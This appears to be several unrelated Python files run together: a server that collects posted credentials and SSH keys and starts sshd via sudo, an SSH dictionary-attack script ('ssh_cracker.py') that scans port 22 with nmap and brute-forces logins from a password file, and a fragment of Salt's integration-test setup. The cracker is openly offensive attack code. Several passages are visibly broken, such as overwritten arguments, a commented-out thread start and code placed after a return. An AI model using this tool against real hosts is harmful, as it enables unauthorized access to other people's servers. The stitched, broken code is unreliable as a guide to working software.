self._query = parse_qs(urlparse(self.path).query)
for k in self._query:
if type(self._query[k]) is list and len(self._query[k]) == 1:
self._query[k] = self._query[k][0]
self._path = urlparse(self.path).path
# Try content-length
self._post_data = ''
self._post_obj = {}
if 'content-length' in self.headers:
content_length = int(self.headers['Content-Length']) # <--- Gets the size of data
self._post_data = self.rfile.read(content_length)
try:
obj = json.loads(self._post_data)
if 'enc' in obj:
self._post_obj = json.loads(aes.decrypt(obj['enc']))
except Exception as ex:
print "Exception: %s" % (ex)
def _ok_resp(self, msg):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(json.dumps({"status": "ok", "message": msg}))
def _error_resp(self, code, error=""):
self.send_response(code)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(json.dumps({"status": "error", "error": error}))
def do_GET(self):
self._handle_input()
print "%s %s %s %s %s" % (self._post_data, self._query, self._path, self._who, self._post_obj)
if self._path == '/getkey' and self._ip == "127.0.0.1" and 'key' in self._query:
if self._query['key'] in globs:
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(globs[self._query['key']])
return
self._error_resp(404)
def do_POST(self):
self._handle_input()
#print "%s %s %s %s %s" % (self._post_data, self._query, self._path, self._who, self._post_obj)
if self._path == '/connect':
if len(self._post_obj) == 0:
return self._error_resp(500, "No credentials provided")
for k in self._post_obj:
globs[k] = self._post_obj[k]
return self._ok_resp()
if self._path == '/ssh_connect':
if 'ssh_key' not in self._post_obj:
return self._error_resp(500, "No credentials provided")
globs['ssh_key'] = self._post_obj['ssh_key']
try:
out = subprocess.check_output("sudo systemctl start ssh", shell=True)
return self._ok_resp(out)
except Exception as ex:
return self._error_resp(500, str(ex))
if self._path == '/encrypt_connect':
if len(self._post_obj) == 0:
return self._error_resp(500, "No credentials provided")
for k in self._post_obj:
globs[k] = self._post_obj[k]
return self._ok_resp()
return self._error_resp(404)
def serve_forever(httpd):
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
finally:
httpd.server_close()
def local_server(httpd):
httpd.serve_forever()
def main():
secure_httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 4443), WebServer)
secure_httpd.socket = ssl.wrap_socket (secure_httpd.socket,
certfile=server_crt_file.name,
keyfile=server_key_file.name,
server_side=True,
cert_reqs=ssl.CERT_REQUIRED, ca_certs=client_list_file.name)
secure_thread = threading.Thread(target=lambda: serve_forever(secure_httpd))
secure_thread.start()
local_httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 8080), WebServer)
local_thread = threading.Thread(target=lambda: serve_forever(local_httpd))
local_thread.start()
try:
while 1:
time.sleep(10)
except KeyboardInterrupt:
print("Exiting")
secure_httpd.shutdown()
local_httpd.shutdown()
secure_thread.join()
local_thread.join()
main()
|
ssh_cracker.py
|
import threading
from threading import Thread
import time
import argparse
from pexpect import pxssh
import nmap
Found = False
Fails = 0
maxConnections = 5
connection_lock = threading.BoundedSemaphore(maxConnections)
def help():
print ("author to show author name")
print ("help to show this massage")
print ("info To show description of the tool ")
print ("show_options to show options of Tools")
print ("")
def options():
print ("options value")
print ("========== ============")
print ("host ",host)
print(" \033[95mYou Must Enter URL with Protocol (Example : https://site.com or http://site.com)")
print(" \033[95mYou Must Write / at The End of URL EX: www.site.com/")
def nmapScan(tgtHost):
nmapScan = nmap.PortScanner()
nmapScan.scan(tgtHost, '22')
state = nmapScan[tgtHost]['tcp'][22]['state']
return state
def connect(host, user, password, release):
global Found
global Fails
try:
s = pxssh.pxssh()
s.login(host, user, password)
print('\n===========================================================')
print('\n[+] Password Found: {}\n'.format(password.decode('utf-8')))
print('===========================================================\n')
Found = True
s.logout()
except Exception as e:
if 'read_nonblocking' in str(e):
Fails += 1
time.sleep(5)
connect(host, user, password, False)
elif 'synchronize with original prompt' in str(e):
time.sleep(1)
connect(host, user, password, False)
finally:
if release:
connection_lock.release()
def run():
parser = argparse.ArgumentParser('SSH Dictionary Based Attack')
parser.add_argument('host', type=str, help='Host IP address for the SSH server')
parser.add_argument('user', type=str, help='Username for the SSH connection')
parser.add_argument('passwordFile', type=str, help='Password file to be used as the dictionary')
args = parser.parse_args()
host = None
user = None
passwordFile = None
global Found
global Fails
print('\n========================================')
print('Welcome to SSH Dictionary Based Attack')
print('========================================\n')
print('[+] Checking SSH port state on {}'.format(host))
if nmapScan(host) == 'open':
print('[+] SSH port 22 open on {}'.format(host))
else:
print('[!] SSH port 22 closed on {}'.format(host))
print('[+] Exiting Application.\n')
exit()
print('[+] Loading Password File\n')
try:
fn = open(passwordFile, 'rb')
except Exception as e:
print(e)
exit(1)
for line in fn:
if Found:
# print('[*] Exiting Password Found')
exit(0)
elif Fails > 5:
print('[!] Exiting: Too Many Socket Timeouts')
exit(0)
connection_lock.acquire()
password = line.strip()
print('[-] Testing Password With: {}'.format(password.decode('utf-8')))
#t = Thread(target=connect, host, user, password)
#t.start()
while (threading.active_count() > 1):
if threading.active_count() == 1 and Found != True:
print('\n===========================================')
print('\nPassword Not Found In Password File.\n')
print('===========================================\n')
print('[*] Exiting Application')
exit(0)
elif threading.active_count() == 1 and Found == True:
print('[*] Exiting Application.\n')
while True:
try:
option = input ("\033[96m┌─[SSF][\033[91m"+name+"\033[96m]\n└─▪ ")
op2 = option.split(" ")
if option == "help":
help()
elif option == "author":
print (author)
elif option == "info":
print (info)
elif option == "show_options":
options()
elif op2[0] == "set":
if op2[1]:
vars()[op2[1]] = op2[2]
print ("%s ==> %s"%(op2[1],op2[2]))
else:
print ("%s Not Found",op2[2])
elif option == "run":
run()
elif option == "exit":
break
else:
print ("Wrong Command ! ")
except:
print ('Unkonwn Error !')
|
__init__.py
|
# -*- coding: utf-8 -*-
'''
Set up the Salt integration test suite
'''
# Import Python libs
from __future__ import absolute_import, print_function
import os
import re
import sys
import copy
import time
import stat
import errno
import signal
import shutil
import pprint
import atexit
import socket
import logging
import tempfile
import threading
import subprocess
import multiprocessing
from datetime import datetime, timedelta
try:
import pwd
except ImportError:
pass
# Import salt tests support dirs
from tests.support.paths import * # pylint: disable=wildcard-import
from tests.support.processes import * # pylint: disable=wildcard-import
from tests.support.unit import TestCase
from tests.support.case import ShellTestCase
from tests.support.parser import PNUM, print_header, SaltTestcaseParser
from tests.support.helpers import requires_sshd_server, RedirectStdStreams
from tests.support.paths import ScriptPathMixin
from tests.support.mixins import CheckShellBinaryNameAndVersionMixin, ShellCaseCommonTestsMixin
from tests.support.mixins import AdaptedConfigurationTestCaseMixin, SaltClientTestCaseMixin
from tests.support.mixins import SaltMinionEventAssertsMixin, SaltReturnAssertsMixin
from tests.support.runtests import RUNTIME_VARS
# Import Salt libs
import salt
import salt.config
import salt.master
import salt.minion
import salt.runner
import salt.output
import salt.version
import salt.utils.color
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.utils.process
import salt.utils.stringutils
import salt.utils.yaml
import salt.log.setup as salt_log_setup
from salt.utils.verify import verify_env
from salt.utils.immutabletypes import freeze
from salt.exceptions import SaltClientError
# Import 3rd-party libs
import msgpack
from salt.ext import six
try:
import salt.ext.six.moves.socketserver as socketserver
except ImportError:
import socketserver
# Import salt tests support libs
from tests.support.processes import SaltMaster, SaltMinion, SaltSyndic
log = logging.getLogger(__name__)
_RUNTESTS_PORTS = {}
def get_unused_localhost_port():
'''
Return a random unused port on localhost
'''
usock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
usock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
usock.bind(('127.0.0.1', 0))
port = usock.getsockname()[1]
if port in (54505, 54506, 64505, 64506, 64510, 64511, 64520, 64521):
# These ports are hardcoded in the test configuration
port = get_unused_localhost_port()
usock.close()
return port
DARWIN = True if sys.platform.startswith('darwin') else False
BSD = True if 'bsd' in sys.platform else False
if DARWIN and port in _RUNTESTS_PORTS:
port = get_unused_localhost_port()
usock.close()
return port
_RUNTESTS_PORTS[port] = usock
if DARWIN or BSD:
usock.close()
return port
def close_open_sockets(sockets_dict):
for port in list(sockets_dict):
sock = sockets_dict.pop(port)
sock.close()
atexit.register(close_open_sockets, _RUNTESTS_PORTS)
SALT_LOG_PORT = get_unused_localhost_port()
class ThreadingMixIn(socketserver.ThreadingMixIn):
daemon_threads = True
class ThreadedSocketServer(ThreadingMixIn, socketserver.TCPServer):
allow_reuse_address = True
def server_activate(self):
self.shutting_down = threading.Event()
socketserver.TCPServer.server_activate(self)
#super(ThreadedSocketServer, self).server_activate()
def server_close(self):
if hasattr(self, 'shutting_down'):
self.shutting_down.set()
socketserver.TCPServer.server_close(self)
#super(ThreadedSocketServer, self).server_close()
class SocketServerRequestHandler(socketserver.StreamRequestHandler):
def handle(self):
unpacker = msgpack.Unpacker(encoding='utf-8')
while not self.server.shutting_down.is_set():
try:
wire_bytes = self.request.recv(1024)
if not wire_bytes:
break
unpacker.feed(wire_bytes)
for record_dict in unpacker:
record = logging.makeLogRecord(record_dict)
logger = logging.getLogger(record.name)
logger.handle(record)
del record_dict
except (EOFError, KeyboardInterrupt, SystemExit):
break
except socket.error as exc:
try:
if exc.errno == errno.WSAECONNRESET:
# Connection reset on windows
break
except AttributeError:
# We're not on windows
pass
log.exception(exc)
except Exception as exc:
log.exception(exc)
class TestDaemon(object):
'''
Set up the master and minion daemons, and run related cases
'''
MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 120
def __init__(self, parser):
self.parser = parser
self.colors = salt.utils.color.get_colors(self.parser.options.no_colors is False)
if salt.utils.platform.is_windows():
# There's no shell color support on windows...
for key in self.colors:
self.colors[key] = ''
def __enter__(self):
'''
Start a master and minion
'''
# Setup the multiprocessing logging queue listener
salt_log_setup.setup_multiprocessing_logging_listener(
self.master_opts
)
# Set up PATH to mockbin
self._enter_mockbin()
if self.parser.options.transport == 'zeromq':
self.start_zeromq_daemons()
elif self.parser.options.transport == 'tcp':
self.start_tcp_daemons()
self.minion_targets = set(['minion', 'sub_minion'])
self.pre_setup_minions()
self.setup_minions()
if getattr(self.parser.options, 'ssh', False):
self.prep_ssh()
if self.parser.options.sysinfo:
try:
print_header(
'~~~~~~~ Versions Report ', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('~~~~~~~ Versions Report ', inline=True)
print('\n'.join(salt.version.versions_report()))
try:
print_header(
'~~~~~~~ Minion Grains Information ', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('~~~~~~~ Minion Grains Information ', inline=True)
grains = self.client.cmd('minion', 'grains.items')
minion_opts = self.minion_opts.copy()
minion_opts['color'] = self.parser.options.no_colors is False
salt.output.display_output(grains, 'grains', minion_opts)
try:
print_header(
'=', sep='=', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('', sep='=', inline=True)
try:
return self
finally:
self.post_setup_minions()
def start_daemon(self, cls, opts, start_fun):
def start(cls, opts, start_fun):
salt.utils.process.appendproctitle('{0}-{1}'.format(self.__class__.__name__, cls.__name__))
daemon = cls(opts)
getattr(daemon, start_fun)()
process = multiprocessing.Process(target=start,
args=(cls, opts, start_fun))
process.start()
return process
def start_zeromq_daemons(self):
'''
Fire up the daemons used for zeromq tests
'''
self.log_server = ThreadedSocketServer(('localhost', SALT_LOG_PORT), SocketServerRequestHandler)
self.log_server_process = threading.Thread(target=self.log_server.serve_forever)
self.log_server_process.daemon = True
self.log_server_process.start()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-master ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.master_process = start_daemon(
daemon_name='salt-master',
daemon_id=self.master_opts['id'],
daemon_log_prefix='salt-master/{}'.format(self.master_opts['id']),
daemon_cli_script_name='master',
daemon_config=self.master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=60)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-master ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-master ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-minion ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.minion_process = start_daemon(
daemon_name='salt-minion',
daemon_id=self.master_opts['id'],
daemon_log_prefix='salt-minion/{}'.format(self.minion_opts['id']),
daemon_cli_script_name='minion',
daemon_config=self.minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=60)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-minion ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-minion ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting sub salt-minion ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.sub_minion_process = start_daemon(
daemon_name='sub salt-minion',
daemon_id=self.master_opts['id'],
daemon_log_prefix='sub-salt-minion/{}'.format(self.sub_minion_opts['id']),
daemon_cli_script_name='minion',
daemon_config=self.sub_minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=60)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting sub salt-minion ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting sub salt-minion ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting syndic salt-master ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.smaster_process = start_daemon(
daemon_name='salt-smaster',
daemon_id=self.syndic_master_opts['id'],
daemon_log_prefix='salt-smaster/{}'.format(self.syndic_master_opts['id']),
daemon_cli_script_name='master',
daemon_config=self.syndic_master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=60)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting syndic salt-master ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting syndic salt-master ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-syndic ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.syndic_process = start_daemon(
daemon_name='salt-syndic',
daemon_id=self.syndic_opts['id'],
daemon_log_prefix='salt-syndic/{}'.format(self.syndic_opts['id']),
daemon_cli_script_name='syndic',
daemon_config=self.syndic_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR,
daemon_class=SaltSyndic,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=60)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-syndic ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-syndic ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
if self.parser.options.proxy:
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-proxy ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.proxy_process = start_daemon(
daemon_name='salt-proxy',
daemon_id=self.master_opts['id'],
daemon_log_prefix='salt-proxy/{}'.format(self.proxy_opts['id']),
daemon_cli_script_name='proxy',
daemon_config=self.proxy_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltProxy,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=60)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-proxy ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-proxy ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
start_tcp_daemons = start_zeromq_daemons
def prep_ssh(self):
'''
Generate keys and start an ssh daemon on an alternate port
'''
sys.stdout.write(
' * {LIGHT_GREEN}Starting {0} ... {ENDC}'.format(
'SSH server',
**self.colors
)
)
keygen = salt.utils.path.which('ssh-keygen')
sshd = salt.utils.path.which('sshd')
if not (keygen and sshd):
print('WARNING: Could not initialize SSH subsystem. Tests for salt-ssh may break!')
return
if not os.path.exists(RUNTIME_VARS.TMP_CONF_DIR):
os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
# Generate client key
pub_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test.pub')
priv_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test')
if os.path.exists(pub_key_test_file):
os.remove(pub_key_test_file)
if os.path.exists(priv_key_test_file):
os.remove(priv_key_test_file)
keygen_process = subprocess.Popen(
[keygen, '-t',
'ecdsa',
'-b',
'521',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'key_test',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=RUNTIME_VARS.TMP_CONF_DIR
)
_, keygen_err = keygen_process.communicate()
if keygen_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.stringutils.to_str(keygen_err)))
sshd_config_path = os.path.join(FILES, 'conf/_ssh/sshd_config')
shutil.copy(sshd_config_path, RUNTIME_VARS.TMP_CONF_DIR)
auth_key_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test.pub')
# Generate server key
server_key_dir = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'server')
if not os.path.exists(server_key_dir):
os.makedirs(server_key_dir)
server_dsa_priv_key_file = os.path.join(server_key_dir, 'ssh_host_dsa_key')
server_dsa_pub_key_file = os.path.join(server_key_dir, 'ssh_host_dsa_key.pub')
server_ecdsa_priv_key_file = os.path.join(server_key_dir, 'ssh_host_ecdsa_key')
server_ecdsa_pub_key_file = os.path.join(server_key_dir, 'ssh_host_ecdsa_key.pub')
server_ed25519_priv_key_file = os.path.join(server_key_dir, 'ssh_host_ed25519_key')
server_ed25519_pub_key_file = os.path.join(server_key_dir, 'ssh_host.ed25519_key.pub')
for server_key_file in (server_dsa_priv_key_file,
server_dsa_pub_key_file,
server_ecdsa_priv_key_file,
server_ecdsa_pub_key_file,
server_ed25519_priv_key_file,
server_ed25519_pub_key_file):
if os.path.exists(server_key_file):
os.remove(server_key_file)
keygen_process_dsa = subprocess.Popen(
[keygen, '-t',
'dsa',
'-b',
'1024',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'ssh_host_dsa_key',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir
)
_, keygen_dsa_err = keygen_process_dsa.communicate()
if keygen_dsa_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.stringutils.to_str(keygen_dsa_err)))
keygen_process_ecdsa = subprocess.Popen(
[keygen, '-t',
'ecdsa',
'-b',
'521',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'ssh_host_ecdsa_key',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir
)
_, keygen_escda_err = keygen_process_ecdsa.communicate()
if keygen_escda_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.stringutils.to_str(keygen_escda_err)))
keygen_process_ed25519 = subprocess.Popen(
[keygen, '-t',
'ed25519',
'-b',
'521',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'ssh_host_ed25519_key',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir
)
_, keygen_ed25519_err = keygen_process_ed25519.communicate()
if keygen_ed25519_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.stringutils.to_str(keygen_ed25519_err)))
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'sshd_config'), 'a') as ssh_config:
ssh_config.write('AuthorizedKeysFile {0}\n'.format(auth_key_file))
if not keygen_dsa_err:
ssh_config.write('HostKey {0}\n'.format(server_dsa_priv_key_file))
if not keygen_escda_err:
ssh_config.write('HostKey {0}\n'.format(server_ecdsa_priv_key_file))
if not keygen_ed25519_err:
ssh_config.write('HostKey {0}\n'.format(server_ed25519_priv_key_file))
self.sshd_pidfile = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'sshd.pid')
self.sshd_process = subprocess.Popen(
[sshd, '-f', 'sshd_config', '-oPidFile={0}'.format(self.sshd_pidfile)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=RUNTIME_VARS.TMP_CONF_DIR
)
_, sshd_err = self.sshd_process.communicate()
if sshd_err:
print('sshd had errors on startup: {0}'.format(salt.utils.stringutils.to_str(sshd_err)))
else:
os.environ['SSH_DAEMON_RUNNING'] = 'True'
roster_path = os.path.join(FILES, 'conf/_ssh/roster')
syndic_roster_path = os.path.join(FILES, 'conf/_ssh/syndic_roster')
shutil.copy(roster_path, RUNTIME_VARS.TMP_CONF_DIR)
shutil.copy(syndic_roster_path, os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'roster'))
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'roster'), 'a') as roster:
roster.write(' user: {0}\n'.format(RUNTIME_VARS.RUNNING_TESTS_USER))
roster.write(' priv: {0}/{1}'.format(RUNTIME_VARS.TMP_CONF_DIR, 'key_test'))
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'roster'), 'a') as roster:
roster.write(' user: {0}\n'.format(RUNTIME_VARS.RUNNING_TESTS_USER))
roster.write(' priv: {0}/{1}'.format(RUNTIME_VARS.TMP_CONF_DIR, 'key_test'))
sys.stdout.write(
' {LIGHT_GREEN}STARTED!\n{ENDC}'.format(
**self.colors
)
)
@classmethod
def config(cls, role):
'''
Return a configuration for a master/minion/syndic.
Currently these roles are:
* master
* minion
* syndic
* syndic_master
* sub_minion
* proxy
'''
return RUNTIME_VARS.RUNTIME_CONFIGS[role]
@classmethod
def config_location(cls):
return RUNTIME_VARS.TMP_CONF_DIR
@property
def client(self):
'''
Return a local client which will be used for example to ping and sync
the test minions.
This client is defined as a class attribute because its creation needs
to be deferred to a latter stage. If created it on `__enter__` like it
previously was, it would not receive the master events.
'''
if 'runtime_client' not in RUNTIME_VARS.RUNTIME_CONFIGS:
RUNTIME_VARS.RUNTIME_CONFIGS['runtime_client'] = salt.client.get_local_client(
mopts=self.master_opts
)
return RUNTIME_VARS.RUNTIME_CONFIGS['runtime_client']
@classmethod
def transplant_configs(cls, transport='zeromq'):
if os.path.isdir(RUNTIME_VARS.TMP_CONF_DIR):
shutil.rmtree(RUNTIME_VARS.TMP_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR)
if not os.path.exists(RUNTIME_VARS.TMP):
os.makedirs(RUNTIME_VARS.TMP)
print(' * Transplanting configuration files to \'{0}\''.format(RUNTIME_VARS.TMP_CONF_DIR))
tests_known_hosts_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'salt_ssh_known_hosts')
with salt.utils.files.fopen(tests_known_hosts_file, 'w') as known_hosts:
known_hosts.write('')
# This master connects to syndic_master via a syndic
master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'master'))
master_opts['known_hosts_file'] = tests_known_hosts_file
master_opts['cachedir'] = os.path.join(TMP, 'rootdir', 'cache')
master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
master_opts['config_dir'] = RUNTIME_VARS.TMP_CONF_DIR
master_opts['root_dir'] = os.path.join(TMP, 'rootdir')
master_opts['pki_dir'] = os.path.join(TMP, 'rootdir', 'pki', 'master')
master_opts['syndic_master'] = 'localhost'
# This minion connects to master
minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'minion'))
minion_opts['cachedir'] = os.path.join(TMP, 'rootdir', 'cache')
minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
minion_opts['config_dir'] = RUNTIME_VARS.TMP_CONF_DIR
minion_opts['root_dir'] = os.path.join(TMP, 'rootdir')
minion_opts['pki_dir'] = os.path.join(TMP, 'rootdir', 'pki')
minion_opts['hosts.file'] = os.path.join(TMP, 'rootdir', 'hosts')
minion_opts['aliases.file'] = os.path.join(TMP, 'rootdir', 'aliases')
# This sub_minion also connects to master
sub_minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'sub_minion'))
sub_minion_opts['cachedir'] = os.path.join(TMP, 'rootdir-sub-minion', 'cache')
sub_minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
sub_minion_opts['config_dir'] = RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR
sub_minion_opts['root_dir'] = os.path.join(TMP, 'rootdir-sub-minion')
sub_minion_opts['pki_dir'] = os.path.join(TMP, 'rootdir-sub-minion', 'pki', 'minion')
sub_minion_opts['hosts.file'] = os.path.join(TMP, 'rootdir', 'hosts')
sub_minion_opts['aliases.file'] = os.path.join(TMP, 'rootdir', 'aliases')
# This is the master of masters
syndic_master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'syndic_master'))
syndic_master_opts['cachedir'] = os.path.join(TMP, 'rootdir-syndic-master', 'cache')
syndic_master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
syndic_master_opts['config_dir'] = RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR
syndic_master_opts['root_dir'] = os.path.join(TMP, 'rootdir-syndic-master')
syndic_master_opts['pki_dir'] = os.path.join(TMP, 'rootdir-syndic-master', 'pki', 'master')
# This is the syndic for master
# Let's start with a copy of the syndic master configuration
syndic_opts = copy.deepcopy(syndic_master_opts)
# Let's update with the syndic configuration
syndic_opts.update(salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'syndic')))
syndic_opts['config_dir'] = RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR
syndic_opts['cachedir'] = os.path.join(TMP, 'rootdir', 'cache')
syndic_opts['root_dir'] = os.path.join(TMP, 'rootdir')
# This proxy connects to master
proxy_opts = salt.config._read_conf_file(os.path.join(CONF_DIR, 'proxy'))
proxy_opts['cachedir'] = os.path.join(TMP, 'rootdir-proxy', 'cache')
if not os.path.exists(proxy_opts['cachedir']):
os.makedirs(proxy_opts['cachedir'])
# proxy_opts['user'] = running_tests_user
proxy_opts['config_dir'] = RUNTIME_VARS.TMP_CONF_DIR
proxy_opts['root_dir'] = os.path.join(TMP, 'rootdir-proxy')
proxy_opts['pki_dir'] = os.path.join(TMP, 'rootdir-proxy', 'pki')
if not os.path.exists(proxy_opts['pki_dir']):
os.makedirs(proxy_opts['pki_dir'])
proxy_opts['hosts.file'] = os.path.join(TMP, 'rootdir-proxy', 'hosts')
proxy_opts['aliases.file'] = os.path.join(TMP, 'rootdir-proxy', 'aliases')
if transport == 'tcp':
master_opts['transport'] = 'tcp'
minion_opts['transport'] = 'tcp'
sub_minion_opts['transport'] = 'tcp'
syndic_master_opts['transport'] = 'tcp'
proxy_opts['transport'] = 'tcp'
# Set up config options that require internal data
master_opts['pillar_roots'] = syndic_master_opts['pillar_roots'] = {
'base': [
RUNTIME_VARS.TMP_PILLAR_TREE,
